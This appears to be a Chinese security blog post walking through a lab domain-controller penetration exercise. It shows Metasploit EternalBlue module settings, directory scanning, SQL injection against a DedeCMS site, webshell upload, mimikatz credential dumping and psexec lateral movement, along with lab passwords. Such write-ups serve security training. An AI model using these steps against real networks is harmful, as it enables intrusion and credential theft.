<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic|Noto Serif SC:300,300italic,400,400italic,700,700italic|Noto Serif SC:300,300italic,400,400italic,700,700italic|Noto Serif SC:300,300italic,400,400italic,700,700italic|Source Code Pro:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/hacker.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/hacker.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/hacker.png?v=5.1.4">


  <link rel="mask-icon" href="/images/hacker.svg?v=5.1.4" color="#222">














<meta name="description" content="信息收集fscan探测主机。">
<meta property="og:type" content="article">
<meta property="og:title" content="铁三域控">
<meta property="og:url" content="https://pursuezhou.github.io/2023/11/25/Penetration/%E9%93%81%E4%B8%89%E5%9F%9F%E6%8E%A7/index.html">
<meta property="og:site_name" content="Pursue">
<meta property="og:description" content="信息收集fscan探测主机。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121185345767.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121185542503.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125085917682.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121200417475.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121200510839.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121200817365.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201123750.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201156884.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201434237.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201514616.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201657065.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201811614.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202059242.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202507438.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202856442.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202528909.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202708843.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125090217186.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125090948565.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125091913905.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125093515722.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125091853762.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125100415084.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125100748886.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125095917625.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125102614810.png">
<meta property="article:published_time" content="2023-11-24T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-13T11:55:24.419Z">
<meta property="article:author" content="Pursue">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121185345767.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://pursuezhou.github.io/2023/11/25/Penetration/铁三域控/"/>





  <title>铁三域控 | Pursue</title>
  








<meta name="generator" content="Hexo 7.1.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pursue</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Better to light one candle than to curse the darkness.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://pursuezhou.github.io/2023/11/25/Penetration/%E9%93%81%E4%B8%89%E5%9F%9F%E6%8E%A7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/wechat.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pursue">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">铁三域控</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2023-11-25T00:00:00+08:00">
                2023-11-25
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Penetration/" itemprop="url" rel="index">
                    <span itemprop="name">Penetration</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>fscan探测主机。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121185345767.png"></p>
<span id="more"></span>

<h2 id="172-25-0-141"><a href="#172-25-0-141" class="headerlink" title="172.25.0.141"></a>172.25.0.141</h2><p>扫到存在永恒之蓝，用msf一把嗦，发现给了报错说是只支持64位的。。。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121185542503.png" alt="image-20231121185542503"></p>
<p>那么需要安装32位的框架和攻击脚本：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</span><br><span class="line">wine -h</span><br><span class="line"></span><br><span class="line">git clone https://gitcode.com/mirrors/1stPeak/Eternalblue-Doublepulsar-Metasploit-master.git</span><br><span class="line">cd Eternalblue-Doublepulsar-Metasploit/</span><br><span class="line">cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/eternalblue_doublepulsar</span><br><span class="line">set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps</span><br><span class="line">set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps</span><br><span class="line">set PROCESSINJECT lsass.exe</span><br><span class="line">set TARGETARCHITECTURE x86</span><br><span class="line"></span><br><span class="line">set rhosts 172.25.0.141</span><br><span class="line">set lhost 10.8.0.98</span><br></pre></td></tr></table></figure>

<p>能够成功拿到session，但似乎wine出了一点问题会断开连接。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125085917682.png" alt="image-20231125085917682"></p>
<h2 id="172-25-0-123"><a href="#172-25-0-123" class="headerlink" title="172.25.0.123"></a>172.25.0.123</h2><p>fscan扫出来应该是一个Web服务，打开来发现是织梦，用gobuster扫一下目录。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u &quot;http://172.25.0.123/&quot; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -b 400-499</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121200417475.png" alt="image-20231121200417475"></p>
<p>官网上下了一套最新的dedecms的源码看一下，对比发现多出来一个&#x2F;sql，挺奇怪的。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121200510839.png" alt="image-20231121200510839"></p>
<p>尝试访问，发现像是一个sql查询的玩意儿，抓包分析一下，GET传参但是没有参数，尝试传入id会有没有什么改变。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121200817365.png" alt="image-20231121200817365"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201123750.png" alt="image-20231121201123750"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201156884.png" alt="image-20231121201156884"></p>
<p>传入不同的id发现页面不同，同时传入2’发现报错，那么大概率是可以sqlmap跑的。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201434237.png" alt="image-20231121201434237"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201514616.png" alt="image-20231121201514616"></p>
<p>找到flag表，成功拿到flag2。同时我们也可以找一找管理员的用户和密码。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201657065.png" alt="image-20231121201657065"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121201811614.png" alt="image-20231121201811614"></p>
<p>解密得到admin的密码是1q2w3e4r，成功进入到后台&#x2F;dede，找到flag1。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202059242.png" alt="image-20231121202059242"></p>
<p>在附件管理中存在一个文件式管理器的功能，可以写木马，同时可以找到flag文件。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202507438.png" alt="image-20231121202507438"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202856442.png" alt="image-20231121202856442"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202528909.png" alt="image-20231121202528909"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231121202708843.png" alt="image-20231121202708843"></p>
<p>收集一下信息发现没有内网，罢了提个权叭。</p>
<p>尝试用suid提权，发现没有用，sudo提示报错需要一个终端去执行，网上搜了一下发现需要修改配置文件&#x2F;etc&#x2F;sudoers，注释掉 Default requiretty 一行，但是我都没提权连cat都看不了文件，就别提修改了。尝试直接登录root，毕竟之前还是爆出了一些密码，最终都失败了，提权到此为止。</p>
<h2 id="172-25-0-141-again"><a href="#172-25-0-141-again" class="headerlink" title="172.25.0.141 again"></a>172.25.0.141 again</h2><p>因为之前永恒之蓝没打通，再尝试尝试其他的入口，先扫一扫端口，发现开了远程桌面，而且记得在打Web服务器的时候有注出密码。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125090217186.png" alt="image-20231125090217186"></p>
<p>登录administrator，密码是topsec.123。开始收集信息，可以看到存在内网。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125090948565.png" alt="image-20231125090948565"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125091913905.png" alt="image-20231125091913905"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125093515722.png" alt="image-20231125093515722"></p>
<p>通过看arp表其实我们已经差不多可以找到域控了。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125091853762.png" alt="image-20231125091853762"></p>
<p>定位到了域控和TEST域。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125100415084.png" alt="image-20231125100415084"></p>
<p>成功抓到了TOPSEC域的管理员密码也就是上文我们Sql注入得到的密码。但是抓不到TEST域的密码。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125100748886.png" alt="image-20231125100748886"></p>
<p><strong>所以这里尝试上传mimikatz试试看能不能抓到，也抓不到。难崩应该是环境重置的问题。找了一个WP，看一下TEST域中administrator抓到的密码是TopSec_2017。</strong></p>
<h2 id="192-168-60-100"><a href="#192-168-60-100" class="headerlink" title="192.168.60.100"></a>192.168.60.100</h2><p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125095917625.png" alt="image-20231125095917625"></p>
<p>发现也开了远程登录的端口，简单了，当然我这尝试了psexec也是可以成功拿到域控权限的。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20231125102614810.png" alt="image-20231125102614810"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2023/11/18/Forensic/2023MeiyaIndividual/" rel="next" title="2023 美亚杯 资格赛">
                <i class="fa fa-chevron-left"></i> 2023 美亚杯 资格赛
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2023/12/01/CTF/2023DASCTF%20X%200psu3/" rel="prev" title="2023 DASCTF X 0psu3">
                2023 DASCTF X 0psu3 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/wechat.jpg"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">61</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">43</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/pursuezhou" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:pursuezhou@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.eonew.cn/" title="Ex" target="_blank">Ex</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xianbeil.github.io/" title="XianBei" target="_blank">XianBei</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://whoamianony.top/" title="WHOAMI" target="_blank">WHOAMI</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.e4l4.com/" title="E4L4" target="_blank">E4L4</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tokameine.top/" title="Tokameine" target="_blank">Tokameine</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://toleleyjl.github.io/" title="Tolele" target="_blank">Tolele</a>
                  </li>
                
              </ul>
            </div>
          

          <div class="wechat_OA">
    <br>
    <span>Welcome to my wechat</span>
    <p></p>
    <img src ="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/wechat.jpg" width="150" height="150">
</div>

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#172-25-0-141"><span class="nav-number">2.</span> <span class="nav-text">172.25.0.141</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#172-25-0-123"><span class="nav-number">3.</span> <span class="nav-text">172.25.0.123</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#172-25-0-141-again"><span class="nav-number">4.</span> <span class="nav-text">172.25.0.141 again</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#192-168-60-100"><span class="nav-number">5.</span> <span class="nav-text">192.168.60.100</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>

  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pursue</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
